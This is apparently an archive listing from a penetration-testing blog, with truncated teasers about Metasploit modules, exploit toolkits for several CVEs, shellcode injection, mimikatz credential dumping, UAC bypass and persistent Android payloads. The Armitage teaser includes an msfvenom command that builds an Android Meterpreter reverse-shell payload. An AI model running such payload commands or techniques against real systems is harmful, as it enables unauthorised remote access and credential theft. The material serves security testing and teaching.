Stækka Metasploit – Extending Metasploit This MSF plugin extends Metasploit for some missing features and modules allowing interaction with other/custom exploits/ways of getting shell access. The current focus here is Linux/Unix support. Core features...
Exploitation / Metasploit / Network PenTest
by do son · Published September 6, 2017 · Last modified October 25, 2022
What is Apache Struts 2 REST Plugin XStream RCE (CVE-2017-9805)? Apache Struts released the latest security bulletin, Apache Struts 2.5.x REST plug-in there is a high-risk vulnerability in the implementation of the remote code,...
Metasploit / Network PenTest / Smartphone PenTest
by do son · Published August 24, 2017 · Last modified November 5, 2017
Make metasploit android payload persistent Add AlarmManager Make service restart on destroy How-to just download release version, unpack android.zip under “data” folder of metasploit-framework’s root directory or compile Compile To compile JavaPayload for Metasploit...
Office8570 Exploit toolkit CVE-2017-8570 – v1.0 Exploit toolkit CVE-2017-8570 – v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to exploit Microsoft Office PPSX RCE. It...
How to install Metasploit-Framework on Ubuntu/Linux Mint Install postgresql Install metasploit + Method 1: + Method 2: Run Metasploit
Load mimikataz on meterpreter to dump clear text password. Token Stealing In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of...
Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro PDF Reader version 11. The saveAs() Javascript API function allows for...
Exploitation / Metasploit / Network PenTest
by do son · Published July 28, 2017 · Last modified October 25, 2022
Shellter Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only)....
nc is the command which runs netcat, a simple Unix utility that reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable “back-end” tool...
Exploitation / Metasploit / Network PenTest
by do son · Published July 25, 2017 · Last modified August 6, 2017
Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015. To start using msfvenom, first please take a look at the options it supports: Linux Windows...
Exploitation / Metasploit / Network PenTest
by do son · Published July 21, 2017 · Last modified August 5, 2017
Tool Name: MeterSSH Written by: David Kennedy Company: TrustedSec Website: https://www.trustedsec.com Twitter: @TrustedSec, @HackingDave MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask...
Metasploit / Network PenTest / Sniffing & Spoofing
by do son · Published July 19, 2017 · Last modified August 5, 2017
Man-in-the-middle attack Abbreviated as MITMA, a man-in-the-middle attack is an attack where a user gets between the sender and receiver of information and sniffs any information being sent. In some cases, users may be...
Metasploit / Network PenTest / Post Exploitation
by do son · Published July 18, 2017 · Last modified August 4, 2017
User Account Control, UAC is a feature introduced with Windows Vista to provide an extra security by preventing administrative rights to programs unless approved by the user. Below is a picture of the UAC confirmation dialog box a user may...
Maintaining Access / Metasploit / Network PenTest
by do son · Published July 4, 2017 · Last modified August 2, 2017
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects...
Metasploit / Network PenTest / Smartphone PenTest
by do son · Published July 3, 2017 · Last modified August 2, 2017
Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework. Create payload using metasploit msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port >...
Secure Your Connection
